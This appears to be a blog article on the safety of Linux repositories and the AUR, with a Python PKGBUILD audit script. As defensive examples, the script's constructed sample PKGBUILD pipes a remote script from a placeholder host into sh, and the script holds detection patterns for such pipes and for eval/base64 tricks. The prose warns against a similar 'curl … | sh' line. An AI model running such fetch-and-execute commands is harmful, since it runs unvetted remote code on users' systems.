How safe are your Linux distribution's repositories?


Various Linux distributions package and maintain their own repositories for users to access. They're pretty handy and provide many different programs and updates. But how can we be sure they're safe? Let's explore it in this relatively short article.

Trusting your operating system's vendor usually means relying on its repositories for updates. But that reliance isn't foolproof; threats can exist despite the trust you place in your distribution's maintainers.

Things can go unnoticed

Just recently, Canonical had to delay the release of Ubuntu 23.10 because hate speech was found in its Ukrainian translations. Of course, good on them for catching it before release. But note what it means: those strings had already passed through the normal contribution process. It's just some translation files, what can go wrong?

In general, it's up to the package maintainers to vet updates and make sure malicious code doesn't slip past them. It can happen if the code isn't thoroughly checked, though I'm not myself sure how often that check even happens. If they see a "trusted" upstream such as VLC, do they really read the code as well, every time?

Common bugs are more dangerous than you think

Imagine an update breaking your system. Has this ever happened to you? It has for me, plenty of times. It happens to plenty of Reddit users on /r/archlinux, and even on /r/fedora. For me personally, Fedora has this weird tendency to break due to its updates. Thankfully I've never had to start from scratch just yet, but it can happen.

The gist of it? I've never had a Linux virus or malware. But I sure did get my system borked a few times by some updates. Many of those can of course be attributed to NVIDIA drivers, but it can happen without them as well.

However, instability or breakage caused by an update can usually be fully recovered from: roll back to the previous package versions, wait for a bugfix, or tweak some configuration. It can be a real time sink though, especially when it happens at the wrong time.

What about the actual malicious software?

It can happen. A package maintainer can go rogue. As far as I know it hasn't happened yet. Probably? Either way, most large distros such as Ubuntu, Fedora or openSUSE are run by reputable companies whose selling points are reliability and security. I wouldn't lose sleep over it with them specifically.

However, if you're adding random third-party repositories to your package manager, trusting their maintainers is on you. Keep in mind that enabling such a repository usually means importing its signing key as well, and that its packages can replace or override the distribution's own: you are extending the same trust you give your distribution to whoever runs that repository.

Arch Linux's AUR is a bit more wild, on the other hand. The AUR isn't part of Arch's official repositories: it's a collection of user-submitted build scripts (PKGBUILDs), and since it's community driven there's a common assumption baked in that somebody has certainly checked the updated source. The truth is, no matter what anyone tells you, if no one checks it and you don't either, then anything goes.

The common advice for Arch users is to always check the source of what you're installing and/or read the PKGBUILD, or to only install popular, actively maintained packages. This is especially true for the AUR, where an old, unmaintained (but still working) package can be orphaned through a request and then adopted by whoever gets there first, including someone who wants to hijack it.
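Reading a PKGBUILD by hand is the advice above; here is what that review actually looks for, as an added example for this article (this is not Arch tooling or the AUR's own code). The script never executes the PKGBUILD, since sourcing one runs arbitrary shell. It pulls the bash arrays and functions out with plain regexes and reports three things: where source=() really points, whether the checksums verify anything (a SKIP entry means makepkg checks nothing), and whether build()/package() do something other than build into $pkgdir, such as piping curl into sh. SAMPLE_PKGBUILD is constructed for the example; its package name, hosts and digest are placeholders.

```python
"""Static PKGBUILD review helper (added example; not Arch tooling).
It never runs the PKGBUILD; it only parses it and reports what a human
reviewer is told to look at. SAMPLE_PKGBUILD is a constructed sample."""
import re
import shlex
from urllib.parse import urlparse

SAMPLE_PKGBUILD = r'''
# Maintainer: Someone <someone@example.invalid>
pkgname=hypothetical-tool
pkgver=1.2.3
pkgrel=2
pkgdesc="Constructed sample package for the audit example"
arch=('x86_64')
url="https://example.invalid/hypothetical-tool"
license=('MIT')
depends=('glibc')
source=("https://example.invalid/releases/hypothetical-tool-${pkgver}.tar.gz"
        "helper.sh::https://files.other-host.invalid/helper.sh"
        "fix-build.patch")
sha256sums=('SKIP'
            'SKIP'
            '0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef')

build() {
  cd "$srcdir/hypothetical-tool-$pkgver"
  make
}

package() {
  cd "$srcdir/hypothetical-tool-$pkgver"
  install -Dm755 hypothetical-tool "$pkgdir/usr/bin/hypothetical-tool"
  install -Dm644 LICENSE "${pkgdir}/usr/share/licenses/$pkgname/LICENSE"
  curl -fsSL https://files.other-host.invalid/helper.sh | sh
  cp "$srcdir/helper.sh" /usr/local/bin/helper
}
'''

# name=( ... ) arrays (a ')' inside a URL would confuse this simple parser),
# name=value scalars, and name() { ... } functions closed by '}' in column 0.
_ARRAY_RE = re.compile(r"^(\w+)=\((.*?)\)\s*$", re.S | re.M)
_SCALAR_RE = re.compile(r"^(\w+)=([\"']?)([^(\n][^\n]*?)\2\s*$", re.M)
_FUNC_RE = re.compile(r"^(\w+)\s*\(\)\s*\{\n(.*?)^\}\s*$", re.S | re.M)

_SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b"),
     "remote script piped straight into a shell"),
    (re.compile(r"\bsudo\b"), "sudo in a build function (makepkg never needs root)"),
    (re.compile(r"\beval\b|base64\s+(-d|--decode)"), "eval/base64 decoding hides what really runs"),
    (re.compile(r"chmod\s+(?:[ugoa]*\+s|[2467]\d{3})\b"), "setuid/setgid bit being set"),
]
# A bare system path inside build()/package() means writing outside $pkgdir.
_OUT_OF_TREE = re.compile(r"(?<!\w)/(etc|usr|var|opt|home|root|boot|bin|sbin|lib)/")
_VCS = ("git", "hg", "svn", "bzr")  # VCS sources legitimately use SKIP


def audit_pkgbuild(text):
    arrays = {m.group(1): shlex.split(m.group(2)) for m in _ARRAY_RE.finditer(text)}
    scalars = {m.group(1): m.group(3) for m in _SCALAR_RE.finditer(text)}
    funcs = {m.group(1): m.group(2) for m in _FUNC_RE.finditer(text)}
    findings = []
    project_host = urlparse(scalars.get("url", "")).hostname or ""

    # 1. Where does each source really come from? ("name::url" renames a download.)
    sources = []
    for entry in arrays.get("source", []):
        parsed = urlparse(entry.split("::", 1)[-1])
        host = parsed.hostname if parsed.scheme else None   # None = file next to the PKGBUILD
        sources.append((entry, host, parsed.scheme))
        if host and project_host and host != project_host and not host.endswith("." + project_host):
            findings.append(f"source '{entry}' comes from {host}, not the project's host {project_host}")

    # 2. Does makepkg verify those sources at all? SKIP means no check whatsoever.
    sum_arrays = {k: v for k, v in arrays.items() if k.endswith("sums")}
    if not sum_arrays:
        findings.append("no checksum array: makepkg will not verify any source")
    for name, sums in sum_arrays.items():
        if name in ("md5sums", "sha1sums"):
            findings.append(f"{name} uses a broken hash; prefer sha256sums or b2sums")
        if len(sums) != len(sources):
            findings.append(f"{name} has {len(sums)} entries for {len(sources)} sources")
        for idx, digest in enumerate(sums[:len(sources)]):
            if digest.upper() == "SKIP" and sources[idx][2].split("+")[0] not in _VCS:
                findings.append(f"{name}[{idx}] is SKIP: '{sources[idx][0]}' is not integrity-checked")

    # 3. What do the shell functions do besides building into $pkgdir?
    for fname, body in funcs.items():
        for line in body.splitlines():
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            for pattern, why in _SUSPICIOUS:
                if pattern.search(line):
                    findings.append(f"{fname}(): {why}: {line}")
            neutral = re.sub(r'"?\$\{?pkgdir\}?"?', "PKGDIR", line)  # "$pkgdir"/usr/... is fine
            if _OUT_OF_TREE.search(neutral):
                findings.append(f"{fname}(): writes to a system path outside $pkgdir: {line}")
    return {"sources": sources, "findings": findings}


if __name__ == "__main__":
    report = audit_pkgbuild(SAMPLE_PKGBUILD)
    for entry, host, _ in report["sources"]:
        print(f"source: {entry}  [{host or 'local file'}]")
    for finding in report["findings"]:
        print("!!", finding)
```

On the constructed sample this reports five problems: a helper script fetched from a host that isn't the project's, two SKIP checksums (so neither download is verified), a curl-into-sh line, and a copy straight into /usr/local/bin. None of that is a verdict; it's the list of lines you then read properly before running makepkg. A package that only unpacks a verified tarball and installs under "$pkgdir" produces no findings.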

Outside of your distribution's repositories, you're more likely to get bitten by a custom extension/plugin/app that you pulled from GitHub. Or worse, by doing something sketchy like this without first checking what the script does:

curl megalegitsite.com/totallylegitscript.sh | sh

The Linux equivalent of downloading a setup.exe, huh?

Linux package managers are actually pretty solid

The real wild west can be found in your local web development shop: Python's pip, or, far worse, npm. You know what's even worse than that? You most likely spend over 50% of your time in your browser anyway, the wild west where those very package managers are used to build the sites we all browse. Actually, oh shoot! When's the last time that obscure blog you visited updated its WordPress plugins? Is this turning into a web security rant?!

Anyway, we don't have it that bad at all. In fact, we're doing pretty great. I can still sleep well. As long as I'm far away from my browser.

The final answer?

Most are pretty darn safe.
Use caution when using third party repositories.
The web is way scarier. It's safer to hide behind the terminal.